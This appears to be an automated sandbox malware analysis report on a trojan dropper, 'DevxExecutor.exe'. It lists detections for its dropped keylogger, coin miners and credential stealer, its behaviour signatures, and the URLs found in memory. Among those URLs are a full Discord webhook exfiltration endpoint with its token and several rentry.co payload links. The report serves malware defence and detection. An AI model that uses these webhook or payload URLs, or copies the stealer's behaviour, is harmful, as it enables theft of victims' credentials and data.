Encrypted powershell cmdline option found 79->213 215 Tries to harvest and steal WLAN passwords 79->215 93 getmac.exe 79->93         started        99 29 other processes 79->99 signatures23 process24 file25 119 C:\ProgramData\svchost.exe, PE32+ 81->119 dropped 121 C:\ProgramData\setup.exe, PE32+ 81->121 dropped 123 C:\ProgramData\main.exe, PE32 81->123 dropped 189 Drops PE files with benign system names 81->189 191 Loading BitLocker PowerShell Module 87->191 101 cmd.exe 91->101         started        193 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 93->193 195 Writes or reads registry keys via WMI 93->195 signatures26 process27

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                DevxExecutor.exe53%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
                                DevxExecutor.exe53%VirustotalBrowse
                                DevxExecutor.exe100%AviraTR/Dropper.Gen
                                DevxExecutor.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\ProgramData\main.exe100%AviraTR/Spy.KeyLogger.kapbl
                                C:\ProgramData\setup.exe100%AviraTR/CoinMiner.lnxah
                                C:\Program Files\Google\Chrome\updater.exe100%AviraTR/CoinMiner.lnxah
                                C:\ProgramData\main.exe100%Joe Sandbox ML
                                C:\ProgramData\Microsoft\hacn.exe100%Joe Sandbox ML
                                C:\ProgramData\setup.exe100%Joe Sandbox ML
                                C:\ProgramData\svchost.exe100%Joe Sandbox ML
                                C:\ProgramData\Microsoft\based.exe100%Joe Sandbox ML
                                C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                                C:\Program Files\Google\Chrome\updater.exe71%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                C:\ProgramData\Microsoft\based.exe47%ReversingLabsWin64.Trojan.Lazy
                                C:\ProgramData\Microsoft\hacn.exe46%ReversingLabsWin64.Trojan.Generic
                                C:\ProgramData\main.exe66%ReversingLabsByteCode-MSIL.Trojan.Zilla
                                C:\ProgramData\setup.exe71%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                C:\ProgramData\svchost.exe42%ReversingLabsWin64.Trojan.Generic
                                C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\VCRUNTIME140.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_bz2.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_ctypes.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_decimal.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_hashlib.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_lzma.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_queue.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_socket.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_sqlite3.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\_ssl.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md.cp311-win_amd64.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\charset_normalizer\md__mypyc.cp311-win_amd64.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\libcrypto-1_1.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\libffi-8.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\libssl-1_1.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\python311.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\select.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\sqlite3.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI11282\unicodedata.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI14722\VCRUNTIME140.dll0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_bz2.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_ctypes.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_decimal.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_hashlib.pyd0%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\_MEI14722\_lzma.pyd0%ReversingLabs

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                SourceDetectionScannerLabelLink
                                discord.com0%VirustotalBrowse
                                raw.githubusercontent.com0%VirustotalBrowse

                                URLs

                                SourceDetectionScannerLabelLink
                                http://www.cl.cam.ac.uk/~mgk25/iso-time.html0%URL Reputationsafe
                                https://foss.heptapod.net/pypy/pypy/-/issues/35390%URL Reputationsafe
                                https://discord.gg/0%URL Reputationsafe
                                https://discord.com)z0%Avira URL Cloudsafe
                                https://stake.com)0%Avira URL Cloudsafe
                                https://coinbase.com)0%Avira URL Cloudsafe
                                https://discord.gift/0%Avira URL Cloudsafe
                                https://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCU0%Avira URL Cloudsafe
                                https://tiktok.com)0%Avira URL Cloudsafe
                                https://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCUsjdPQ1Te7Pa_y0P8C8O0P0%Avira URL Cloudsafe
                                https://ebay.com)z$0%Avira URL Cloudsafe
                                https://discord.com)0%Avira URL Cloudsafe
                                https://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCU0%VirustotalBrowse
                                https://discord.gift/3%VirustotalBrowse
                                https://rentry.co/pmpxa/rawz0%Avira URL Cloudsafe
                                https://stake.com))0%Avira URL Cloudsafe
                                https://paypal.com)0%Avira URL Cloudsafe
                                https://disney.com)z$0%Avira URL Cloudsafe
                                https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt0%Avira URL Cloudsafe
                                https://rentry.co/5uu99/rawzyhttps://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63U0%Avira URL Cloudsafe
                                https://riotgames.com)0%Avira URL Cloudsafe
                                https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                                https://xbox.com)0%Avira URL Cloudsafe
                                https://youtube.com)0%Avira URL Cloudsafe
                                https://twitch.com)z0%Avira URL Cloudsafe
                                https://checkip.amazonaws.comz0%Avira URL Cloudsafe
                                https://rentry.co/pmpxa/rawz2%VirustotalBrowse
                                https://rentry.co/5uu99/rawzyhttps://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63U4%VirustotalBrowse
                                https://superfurrycdn.nl/copy/100%Avira URL Cloudmalware
                                https://amazon.com)0%Avira URL Cloudsafe
                                https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txt0%VirustotalBrowse
                                https://crunchyroll.com)0%Avira URL Cloudsafe
                                https://gmail.com)z0%Avira URL Cloudsafe
                                https://discord.com/api/v9/users/0%VirustotalBrowse
                                https://paypal.com)z0%Avira URL Cloudsafe
                                https://superfurrycdn.nl/copy/10%VirustotalBrowse
                                https://uber.com)z0%Avira URL Cloudsafe
                                https://coinbase.com)z0%Avira URL Cloudsafe
                                https://rentry.co/u4tup/raw0%Avira URL Cloudsafe
                                https://geolocation-db.com/jsonp/z0%Avira URL Cloudsafe
                                https://ebay.com)0%Avira URL Cloudsafe
                                https://roblox.com)z0%Avira URL Cloudsafe
                                https://hbo.com)z0%Avira URL Cloudsafe
                                https://rentry.co/u4tup/raw8%VirustotalBrowse
                                https://binance.com)z0%Avira URL Cloudsafe
                                https://geolocation-db.com/jsonp/z0%VirustotalBrowse
                                https://discord.gg/r0%Avira URL Cloudsafe
                                https://playstation.com)0%Avira URL Cloudsafe
                                https://sellix.io)0%Avira URL Cloudsafe
                                https://twitter.com)z0%Avira URL Cloudsafe
                                https://disney.com)0%Avira URL Cloudsafe
                                https://discord.com/api/v6/guilds/0%Avira URL Cloudsafe
                                https://tiktok.com)z0%Avira URL Cloudsafe
                                https://origin.com)z0%Avira URL Cloudsafe
                                https://telegram.com)z0%Avira URL Cloudsafe
                                https://discord.gg/r0%VirustotalBrowse
                                https://riotgames.com)z0%Avira URL Cloudsafe
                                https://playstation.com)z0%Avira URL Cloudsafe
                                https://pornhub.com)z0%Avira URL Cloudsafe
                                https://rentry.co/5uu99/raw100%Avira URL Cloudmalware
                                https://mahler:8092/site-updates.py0%Avira URL Cloudsafe
                                https://twitch.com)0%Avira URL Cloudsafe
                                https://steam.com)z0%Avira URL Cloudsafe
                                http://.../back.jpeg0%Avira URL Cloudsafe
                                https://netflix.com)z0%Avira URL Cloudsafe
                                https://api.ipify.orgr0%Avira URL Cloudsafe
                                https://minecraft.net)z0%Avira URL Cloudsafe
                                https://yahoo.com)0%Avira URL Cloudsafe
                                https://netflix.com)0%Avira URL Cloudsafe
                                https://gmail.com)0%Avira URL Cloudsafe
                                https://origin.com)0%Avira URL Cloudsafe
                                https://roblox.com)0%Avira URL Cloudsafe
                                https://outlook.com)0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                discord.com
                                		162.159.138.232
                                		truefalseunknown
                                raw.githubusercontent.com
                                		185.199.108.133
                                		truefalseunknown
                                ip-api.com
                                		208.95.112.1
                                		truefalse
                                  		high
                                  api.telegram.org
                                  		149.154.167.220
                                  		truefalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCUsjdPQ1Te7Pa_y0P8C8O0Pfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://raw.githubusercontent.com/attationin/Cloud/main/Milinfo.txtfalse
                                    • 0%, Virustotal, Browse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://github.com/urllib3/urllib3/issues/29203cstealer.exe, 00000003.00000002.2675138815.00000271DA2A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://discord.com/api/webhooks/1237846362008195163/ZDvWlv-CgO7k2ie63UbKQjPqKJJV4I85cFC7RbPTP5wjqCUcstealer.exe, 00000003.00000002.2632028088.00000271D9EA0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2315471256.0000020102B10000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • 0%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://discord.gift/cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • 3%, Virustotal, Browse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://coinbase.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://discord.com)zcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://stake.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://tiktok.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://ebay.com)z$cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://discord.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#cstealer.exe, 00000003.00000003.2496465126.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517603563.00000271D7FBB000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2552340885.00000271D7FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2170872788.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171428762.00000271D7FB8000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2606175043.00000271D7FC7000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2485689616.00000271D7F8B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2559182530.00000271D7FC6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2501467539.00000271D7FB4000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2538666692.00000271D7FBF000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2171077261.00000271D7FA4000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2203058779.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2197523514.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220053120.00000170D9E6C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209729634.00000170D9E54000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000002.2220583600.00000170DBBF0000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2213524032.00000170D9E6B000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2209794451.00000170D9E59000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2196404172.00000170D9E5D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000008.00000003.2208035607.00000170D9E53000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2283436771.0000020100D41000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://rentry.co/pmpxa/rawzcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • 2%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://media.discordapp.net/attachments/1111364024408494140/1111364181032177766/cs.pngrYcstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://stake.com))cstealer.exe, 00000003.00000003.2172766781.00000271D9FB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000002.2648903466.00000271DA037000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2184604455.00000271D9FC1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2539385237.00000271DA035000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2494640620.00000271DA030000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218277639.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2211211396.0000020102CB6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102CF6000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219438369.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2216090546.0000020102C63000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2290594631.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2321140918.0000020102D0D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102CF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          https://tools.ietf.org/html/rfc2388#section-4.4cstealer.exe, 00000003.00000002.2628303853.00000271D9E83000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2495003008.00000271D9E7F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2553076024.00000271D9E82000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2178442107.00000271D9E64000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2550902287.00000271D9E80000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2484503329.00000271D9E7D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2407518867.00000271D9E5D000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2443036423.00000271D9E7C000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2177316384.00000271D9E57000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275592639.0000020102C31000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2297938148.0000020102C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64cstealer.exe, 00000003.00000003.2183488711.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2455429360.00000271DA12B000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2179233556.00000271DA11F000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2473409999.00000271DA141000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2517647465.00000271DA142000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000003.00000003.2173830510.00000271DA10E000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2215320232.0000020102DEC000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2337980032.0000020102E0A000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2212604471.0000020102DEE000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287998421.0000020102DFD000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2289505736.0000020102E05000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2275737763.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2218139223.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2221688107.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2219861394.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2272438628.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2287046856.0000020102DD2000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2220789143.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2282192132.0000020102DD1000.00000004.00000020.00020000.00000000.sdmp, cstealer.exe, 00000009.00000003.2213329573.0000020102DEE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://paypal.com)cstealer.exe, 00000003.00000002.2671730030.00000271DA1A0000.00000004.00001000.00020000.00000000.sdmp, cstealer.exe, 00000009.00000002.2339606030.0000020102E30000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
